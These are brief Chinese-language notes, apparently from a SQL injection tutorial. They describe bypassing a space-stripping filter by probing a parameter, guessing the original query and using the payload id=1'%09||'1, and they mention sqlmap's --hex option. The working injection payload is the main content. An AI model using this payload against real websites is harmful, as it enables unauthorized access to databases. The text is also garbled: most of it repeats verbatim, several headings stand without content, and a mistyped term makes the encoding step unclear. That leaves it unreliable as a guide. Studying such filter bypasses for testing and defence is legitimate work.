基礎知識介紹
去除空格的代碼分析
上面的代碼我很煩
因爲他把你很多注入方法都給過濾了
繞過去除空格的SQL注入
輸入id=1正確
輸入id=1’錯誤,猜測原sql語句爲
id=‘id’
同時輸入id=1\正確
猜測過濾了反斜槓
繞過語句
id=1’%09||'1
正確
Sqlmap安全測試
–hex進行16禁止編碼
上面的代碼我很煩
因爲他把你很多注入方法都給過濾了
輸入id=1正確
輸入id=1’錯誤,猜測原sql語句爲
id=‘id’
同時輸入id=1\正確
猜測過濾了反斜槓
繞過語句
id=1’%09||'1
正確
–hex進行16禁止編碼